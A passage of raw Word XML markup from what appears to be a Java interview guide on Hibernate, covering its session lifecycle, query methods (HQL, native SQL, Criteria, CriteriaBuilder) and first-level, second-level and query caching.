          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00D706F7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>leared when session closes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B91E82" w14:textId="00FCE8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Second Level Cache (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E791ED2"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Shared across sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29CDAC"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Needs explicit configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9DE80" w14:textId="04E5CE59" w:rsidR="00D706F7"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Reduces database hits for frequently accessed data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73480B4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Example Complete Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975A94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ibernateExa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ECEAF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FF6A4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1. Configure and build SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C665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p>
    <w:p w14:paraId="400E842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07EF90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0C91CAE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021EAF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2. Open session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040DB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132DE30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p>
    <w:p w14:paraId="626C1B0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6855A2F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59221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3. Begin transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D8FB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41FF44A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8F8DCE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4. Create and persist object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E408DB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newEmploye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0D8AB8D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Michael Johnson"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1217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75000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC94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2370027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5. Save to database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B7E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employe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Lo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ewEmployee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D963D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mployee saved with ID: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mployeeId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7E06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2C8E38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6. Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE760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4E92FAA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7A5D7A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304E90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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110746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F4E07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7. Close session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B5DE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509D95E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488D4B1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F86685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A36A0C" w14:textId="5107974F"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D831C9" w14:textId="77777777" w:rsidR="00817C2D" w:rsidRPr="00CE4B95" w:rsidRDefault="00817C2D" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756A1C72" w14:textId="114B3B07"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Key Benefits of Hibernate Persistence</w:t>
      </w:r>
      <w:r w:rsidR="00D26DF8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF8965"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Object-Oriented Approach - Work with objects rather than SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA668F4"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Automatic SQL Generation - No need to write CRUD queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08786147"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Transaction Management - Built-in support for ACID properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58354870"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Caching - Improves performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B0273" w14:textId="1016DD52"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Database Independence - Switch databases with minimal code changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B4CBE" w14:textId="2810FE3F" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19CA68" w14:textId="5D3BF809" w:rsidR="00054A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="007E333A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="_Toc197867771"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve select query using Hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00054A9D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:p w14:paraId="44DC6C8E" w14:textId="1999571B" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B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using a SELECT query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can use one of the following approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D4C4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85110">
          <v:rect id="_x0000_i2397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3B959"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Using HQL (Hibernate Query Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A73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QL is object-oriented and works with entity class names and properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05C19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0DFB736"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11845CC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1DE8D13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7AEA298"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1A0478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0CE4191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FAB8F1">
          <v:rect id="_x0000_i2398" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3A9E0"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Using Native SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8CF6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when you want to write database-specific SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9011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9AB164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2381D27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SQLQuery(sql).addEntity(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46732B8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4B5A3BF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FBACBE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1C2DCCC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95BF22">
          <v:rect id="_x0000_i2399" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24153F3D"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ing Criteria API (Hibernate 5 and below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27DE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dynamic query building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88135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15A51D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510159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3BCBB66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criteria.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121D96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5A9CFBAF"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D23D11">
          <v:rect id="_x0000_i2400" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5370512C"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Using JPA CriteriaBuilder (Hibernate 5+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6F4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For type-safe and dynamic queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3546709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A590F9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75B8E8E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51CCC5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7C9831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48B747D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session.createQuery(cq).getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B3927"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2DC5C4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D741F">
          <v:rect id="_x0000_i2401" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD7BE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ach approach has its use case depending on flexibility, type-safety, and performance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A226759" w14:textId="65A4648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402" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BE412" w14:textId="1114C8B4" w:rsidR="00FC5A6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC5A6D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="_Toc197867772"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve data through hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>
    </w:p>
    <w:p w14:paraId="32724FB0" w14:textId="74403D0B" w:rsidR="00077806" w:rsidRPr="007F3379" w:rsidRDefault="00077806"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through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typically follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667CE6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C9462C">
          <v:rect id="_x0000_i2403" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3767345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Configure Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FDA68"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bernate.cfg.xml or annotations to set up DB connection and entity mappings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A715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5D08A">
          <v:rect id="_x0000_i2404" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335BF5B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Open Hibernate Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE74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ssionFactory to get a session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9D91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53B70DF"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6E0DB6">
          <v:rect id="_x0000_i2405" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64660987"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Retrieve Data Using Any of These Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39887D2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HQL (Hibernate Query Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436E7D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0969CBD3"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Query(hql, Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD1C8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3FBDD0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705A3C2A"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Native SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2F81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62B371BA"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SQLQuery(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EC656"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ddEntity(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB9BF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6E8A706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5007D373"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Criteria API (older versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747B2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74895D2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54C8623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criteria.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D7E6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 JPA CriteriaBuilder (recommended in Hibernate 5+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195F5E7"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01076E4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151E0E4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D15AE8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03D4568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session.createQuery(cq).getResultList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04076789"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0AED8">
          <v:rect id="_x0000_i2406" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1BAFF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4. Close the Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B3FB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E466D3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1ED7BF1A"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xml:space="preserve"> for simplicity and object-based querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB1B3D"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for DB-specific queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0E85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for dynamic or conditional queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E7B7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ways close the session after use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE3F28" w14:textId="63BC4CA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407" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD6338" w14:textId="03755D15" w:rsidR="006764D9" w:rsidRPr="00CE4B95" w:rsidRDefault="002331D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="_Toc197867773"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hibernate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>aching?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:p w14:paraId="62F27782" w14:textId="38A5A4D6" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4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aching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> improves performance by reducing the number of database hits. It stores frequently accessed data in memory so repeated queries can be served quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF91B8"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68D76">
          <v:rect id="_x0000_i2408" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5EB01"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Caching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387550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CDB69D">
          <v:rect id="_x0000_i2409" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA3866"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First-Level Cache (Default, Session Scoped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284245B2"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p w14:paraId="117890B0"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d per Hibernate Session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59536D4D"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me session → same entity requested → fetched from cache, not DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70951A1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31776AC"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 // Hits DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630578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get(Employee.class, 1); // From cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A0A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3A190">
          <v:rect id="_x0000_i2410" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DBFAF"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Second-Level Cache (Optional, SessionFactory Scoped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF4230"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sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B0C52"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explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35847A4F"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ires integration with cache providers like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654FE58"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hcache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE410B"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finispan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39024359"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azelcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE8D0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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4AA9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use_second_level_cache"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A06DE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region.factory_class"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4AF46"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rg.hibernate.cache.ehcache.EhCacheRegionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4FC8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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB98B4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Annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C203B3D"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B8D925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7132EA57"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4954FF4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BA0D51">
          <v:rect id="_x0000_i2411" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2CB78"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Query Cache (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD491AA"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the result of queries (not entities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE4DCC7"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second-level cache enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6BD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FROM Employee");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C04245"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Cacheable(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB05A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33D5383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9DCDF2">
          <v:rect id="_x0000_i2412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DAF160"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391"/>
        <w:gridCol w:w="1523"/>
        <w:gridCol w:w="3418"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="501993A7" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B6A9D5C"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ache Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14238FB7"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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334D2949"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 Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3235AC23"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ical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="72032CBE" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00425ED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rst-Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3C0FA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54324FF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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2931AE9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ault for every Hibernate session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="55A5BDA5" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED872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cond-Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509D494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3D0FE9F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268EF6F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entities across sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="03C508C1" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5269413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Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF72EB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67C7557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65262778"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pensive, frequently run queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38ED85A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caching improves efficiency and scalability by reducing DB access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332A76D" w14:textId="415F002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BC05A">
          <v:rect id="_x0000_i2413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F1908" w14:textId="41B64BB3" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="_Toc197867774"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain L1 and L2 cache in Hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:p w14:paraId="157A1D46" w14:textId="2C0F1C5D" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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First-Level) Cache and L2 (Second-Level) Cache in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1B4BD"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8711E">
          <v:rect id="_x0000_i2414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F73E1"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Cache (First-Level Cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D4193"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D97F25"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by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF60A4"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entities within the same session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B683D"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shared across sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAE53F"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Automatically manages lifecycle with the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF969B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D5A7F49"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3D1BE2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1 = session.get(Employee.class, 101); // Hits DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0078C593"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2 = session.get(Employee.class, 101); // From L1 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34403EF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F852EE">
          <v:rect id="_x0000_i2415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD5EA8"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2 Cache (Second-Level Cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE523D8"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Factory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CD844"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t enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721931A"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multiple sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E152396"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Requires external cache provider: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Hazelcast</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
